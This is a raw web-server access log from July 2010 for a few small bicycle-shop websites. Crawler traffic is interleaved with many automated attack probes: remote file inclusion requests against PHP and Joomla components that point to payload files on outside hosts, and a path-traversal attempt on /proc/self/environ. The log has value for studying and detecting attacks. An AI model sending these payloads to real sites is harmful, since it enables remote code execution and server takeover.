66.246.218.140 - - [11/Jul/2010:06:20:13 -0700] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
66.246.218.140 - - [11/Jul/2010:06:20:14 -0700] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:06:24:44 -0700] "GET /bullitinboard/viewtopic.php?p=13104&sid=0ab301dc90d1de1d62bd28211690ca2d HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
64.22.67.47 - - [11/Jul/2010:06:28:28 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.22.67.47 - - [11/Jul/2010:06:28:34 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.22.67.47 - - [11/Jul/2010:06:28:34 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.201.66.22 - - [11/Jul/2010:06:31:15 -0700] "GET /logs/access_100310.log HTTP/1.0" 200 1769472 "http://svbikes.com/logs/access_100310.log" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)" "svbikes.com"
64.22.67.47 - - [11/Jul/2010:06:38:42 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.22.67.47 - - [11/Jul/2010:06:38:42 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.22.67.47 - - [11/Jul/2010:06:38:42 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.22.67.47 - - [11/Jul/2010:06:38:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.22.67.47 - - [11/Jul/2010:06:38:46 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.22.67.47 - - [11/Jul/2010:06:38:46 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tcphotography.me.uk/dreaming/1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [11/Jul/2010:06:41:39 -0700] "GET /bullitinboard/viewtopic.php?p=3514 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:06:46:17 -0700] "GET /bullitinboard/viewtopic.php?p=4426 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
110.45.147.237 - - [11/Jul/2010:06:49:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
62.44.123.3 - - [11/Jul/2010:06:50:19 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
110.45.147.237 - - [11/Jul/2010:06:50:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
87.202.183.234 - - [11/Jul/2010:06:50:59 -0700] "GET /artlinks.dispnew.phphttp://hardc0re.drivehq.com/id0.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "bicyclestoreshouston.com"
67.195.112.217 - - [11/Jul/2010:06:55:02 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.217 - - [11/Jul/2010:06:55:03 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
174.133.6.242 - - [11/Jul/2010:06:55:09 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [11/Jul/2010:06:55:15 -0700] "GET /skin/board/moviefl/download.php?board_skin_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [11/Jul/2010:06:55:15 -0700] "GET /logs/skin/board/moviefl/download.php?board_skin_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.133.6.242 - - [11/Jul/2010:06:55:15 -0700] "GET /logs/access.log%20%20/skin/board/moviefl/download.php?board_skin_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.87 - - [11/Jul/2010:07:00:41 -0700] "GET /?M=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.87 - - [11/Jul/2010:07:02:20 -0700] "GET /?N=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
174.133.6.242 - - [11/Jul/2010:07:04:07 -0700] "GET /logs/access.log/skin/board/moviefl/download.php?board_skin_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:07:06:38 -0700] "GET /translations/English-US.txt HTTP/1.1" 200 32000 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
174.133.6.242 - - [11/Jul/2010:07:07:28 -0700] "GET /logs/access.log/skin/board/moviefl/download.php?board_skin_path=http://recky.webs.com/autoid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.196.97.159 - - [11/Jul/2010:07:10:47 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "svbikes.com"
66.196.97.159 - - [11/Jul/2010:07:10:49 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "svbikes.com"
209.191.87.215 - - [11/Jul/2010:07:10:51 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "svbikes.com"
209.191.87.215 - - [11/Jul/2010:07:10:54 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "svbikes.com"
77.232.72.10 - - [11/Jul/2010:07:17:54 -0700] "GET /logs/access_100510.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://polotele.fileave.com/scane107.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.svbikes.com"
77.232.72.10 - - [11/Jul/2010:07:17:54 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://polotele.fileave.com/scane107.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.svbikes.com"
77.232.72.10 - - [11/Jul/2010:07:17:54 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://polotele.fileave.com/scane107.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.svbikes.com"
87.250.252.242 - - [11/Jul/2010:07:19:47 -0700] "GET /index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "bicyclestoreshouston.com"
87.202.183.234 - - [11/Jul/2010:07:28:51 -0700] "GET /logs/access_091210.log/artlinks.dispnew.phphttp://hardc0re.drivehq.com/id0.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "bicyclestoreshouston.com"
87.202.183.234 - - [11/Jul/2010:07:28:51 -0700] "GET /artlinks.dispnew.phphttp://hardc0re.drivehq.com/id0.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "bicyclestoreshouston.com"
87.202.183.234 - - [11/Jul/2010:07:28:52 -0700] "GET /logs/artlinks.dispnew.phphttp://hardc0re.drivehq.com/id0.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "bicyclestoreshouston.com"
178.154.163.29 - - [11/Jul/2010:07:29:56 -0700] "GET /aboutus.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
78.46.59.3 - - [11/Jul/2010:07:40:52 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
78.46.59.3 - - [11/Jul/2010:07:40:52 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
78.46.59.3 - - [11/Jul/2010:07:40:52 -0700] "GET /logs/access_100510.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
78.46.59.3 - - [11/Jul/2010:07:41:11 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
78.46.59.3 - - [11/Jul/2010:07:41:11 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
78.46.59.3 - - [11/Jul/2010:07:41:12 -0700] "GET /logs/access_100510.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.106.247.246 - - [11/Jul/2010:07:41:16 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.106.247.246 - - [11/Jul/2010:07:41:16 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.106.247.246 - - [11/Jul/2010:07:41:16 -0700] "GET /logs/access_100510.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
87.106.247.246 - - [11/Jul/2010:07:43:44 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.247.246 - - [11/Jul/2010:07:43:44 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.247.246 - - [11/Jul/2010:07:43:44 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.247.246 - - [11/Jul/2010:07:43:48 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.247.246 - - [11/Jul/2010:07:43:48 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.247.246 - - [11/Jul/2010:07:43:48 -0700] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://mall.yjecrc.or.kr//bbs/Template/Mobile/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:07:48:07 -0700] "GET /bullitinboard/viewtopic.php?p=16063 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
77.79.246.200 - - [11/Jul/2010:08:04:30 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:04:30 -0700] "GET /logs/access.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:04:30 -0700] "GET /logs/access.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:04:30 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:04:30 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:04:30 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:06:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:06:11 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:06:28 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:06:28 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:06:28 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.79.246.200 - - [11/Jul/2010:08:06:28 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:08:08:07 -0700] "GET /bullitinboard/viewtopic.php?p=16767 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
88.80.209.57 - - [11/Jul/2010:08:11:03 -0700] "GET //bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.80.209.57 - - [11/Jul/2010:08:11:03 -0700] "GET /logs/access.log%20%20///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.80.209.57 - - [11/Jul/2010:08:11:03 -0700] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.80.209.57 - - [11/Jul/2010:08:12:24 -0700] "GET //bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.80.209.57 - - [11/Jul/2010:08:12:24 -0700] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.80.209.57 - - [11/Jul/2010:08:12:24 -0700] "GET /logs/access.log%20%20///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.80.209.57 - - [11/Jul/2010:08:14:34 -0700] "GET //bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
88.80.209.57 - - [11/Jul/2010:08:14:34 -0700] "GET /logs/access_100510.log///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
88.80.209.57 - - [11/Jul/2010:08:14:34 -0700] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
88.80.209.57 - - [11/Jul/2010:08:15:48 -0700] "GET //bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
88.80.209.57 - - [11/Jul/2010:08:15:48 -0700] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
88.80.209.57 - - [11/Jul/2010:08:15:48 -0700] "GET /logs/access_100510.log///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:08:26:26 -0700] "GET /logs/scripts.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
88.80.209.57 - - [11/Jul/2010:08:27:46 -0700] "GET /logs/access.log///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
88.80.209.57 - - [11/Jul/2010:08:27:58 -0700] "GET /logs/access.log///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.72.250.201 - - [11/Jul/2010:08:29:31 -0700] "GET /logs/access.log HTTP/1.1" 200 268381 "http://www.svbikes.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:08:45:10 -0700] "GET /bullitinboard/viewtopic.php?p=15154 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
87.250.252.242 - - [11/Jul/2010:08:45:19 -0700] "GET /translations/ HTTP/1.1" 200 3847 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
201.116.197.150 - - [11/Jul/2010:08:53:26 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.porto.napoli.it/tt/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
201.116.197.150 - - [11/Jul/2010:08:53:27 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.porto.napoli.it/tt/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
216.143.131.138 - - [11/Jul/2010:09:03:40 -0700] "GET /logs/access.log HTTP/1.0" 200 269438 "http://houstonbikeshop.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:09:05:56 -0700] "GET /bullitinboard/viewtopic.php?p=13077 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
87.250.252.242 - - [11/Jul/2010:09:19:04 -0700] "GET /Rides.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "bicyclestoreshouston.com"
178.154.163.29 - - [11/Jul/2010:09:24:19 -0700] "GET /index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:09:44:47 -0700] "GET /bullitinboard/viewtopic.php?p=12939 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
201.116.197.150 - - [11/Jul/2010:09:54:52 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.porto.napoli.it/tt/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
201.116.197.150 - - [11/Jul/2010:09:54:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.porto.napoli.it/tt/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
201.116.197.150 - - [11/Jul/2010:09:54:53 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.porto.napoli.it/tt/data/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "houstonbikeshop.com"
119.63.193.75 - - [11/Jul/2010:09:57:27 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.193.75 - - [11/Jul/2010:09:59:33 -0700] "GET /bullitinboard/viewtopic.php?p=4429 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
67.195.112.217 - - [11/Jul/2010:10:02:05 -0700] "GET /bullitinboard/viewtopic.php?p=15422 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.233 - - [11/Jul/2010:10:04:15 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
67.195.111.233 - - [11/Jul/2010:10:04:15 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
178.154.163.29 - - [11/Jul/2010:10:04:44 -0700] "GET /bullitinboard/viewtopic.php?p=2608 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
82.41.194.240 - - [11/Jul/2010:10:05:42 -0700] "GET /translations/Hungarian.txt HTTP/1.1" 200 32528 "http://www.google.co.uk/url?sa=t&source=web&cd=13&ved=0CEgQFjAM&url=http%3A%2F%2Fwww.svbikes.com%2Ftranslations%2FHungarian.txt&rct=j&q=hungarian.txt&ei=P_k5TPjfM4KdlgeZ77zVBw&usg=AFQjCNE9RCXQoZoXzD8ecOk84WrE41odQQ" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; msn OptimizedIE8;ENGB)" "www.svbikes.com"
82.41.194.240 - - [11/Jul/2010:10:05:42 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; msn OptimizedIE8;ENGB)" "www.svbikes.com"
67.195.111.233 - - [11/Jul/2010:10:05:44 -0700] "GET /translations/ HTTP/1.0" 200 3831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
64.202.115.179 - - [11/Jul/2010:10:09:11 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
64.202.115.179 - - [11/Jul/2010:10:09:13 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
64.202.115.179 - - [11/Jul/2010:10:09:13 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.vincenttractors.co.uk/images/new/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "bicyclestoreshouston.com"
